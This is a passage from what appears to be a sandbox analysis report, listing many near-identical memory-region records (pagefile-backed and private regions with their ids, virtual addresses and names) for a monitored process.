end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8748 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8749 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8750 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8751 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8752 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8753 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8754 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8755 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8756 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8757 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8758 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8759 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8760 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8761 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8762 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8763 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8764 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8765 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8766 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8767 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8768 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8769 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8770 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8771 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8772 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8773 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8774 start_va = 0x2880000 end_va = 0x2880fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8775 start_va = 0x2880000 end_va = 0x288ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002880000" filename = "" Region: id = 8776 start_va = 0x4120000 end_va = 0x413dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004120000" filename = "" Region: id = 8777 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8778 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8779 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8780 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8781 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8782 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8783 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8784 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8785 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8786 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8787 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8788 start_va = 0x2880000 end_va = 0x2880fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8789 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8790 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8791 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8792 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8793 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8794 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8795 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8796 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8797 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8798 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8799 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8800 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8801 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8802 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8803 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8804 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8805 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8806 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8807 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8808 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8809 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8810 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8811 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8812 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8813 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8814 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8815 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8816 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8817 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8818 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8819 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8820 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8821 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8822 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8823 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8824 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8825 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8826 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8827 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8828 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8829 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8830 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8831 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8832 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8833 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8834 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8835 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8836 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8837 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8838 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8839 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8840 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8841 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8842 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8843 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8844 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8845 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8846 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8847 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8848 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8849 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8850 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8851 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8852 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8853 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8854 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8855 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8856 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8857 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8858 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8859 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8860 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8861 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8862 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8863 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8864 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8865 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8866 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8867 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8868 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8869 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8870 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8871 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8872 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8873 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8874 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8875 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8876 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8877 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8878 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8879 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8880 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8881 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8882 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8883 start_va = 0x2880000 end_va = 0x2880fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8884 start_va = 0x2880000 end_va = 0x288ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002880000" filename = "" Region: id = 8885 start_va = 0x4120000 end_va = 0x413dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004120000" filename = "" Region: id = 8886 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8887 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8888 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8889 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8890 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8891 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8892 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8893 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8894 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8895 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8896 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8897 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8898 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8899 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8900 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8901 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8902 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8903 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8904 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8905 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8906 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8907 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8908 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8909 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8910 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8911 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8912 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8913 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8914 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8915 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8916 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8917 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8918 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8919 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8920 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8921 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8922 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8923 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8924 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8925 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8926 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8927 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8928 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8929 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8930 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8931 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8932 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8933 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8934 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8935 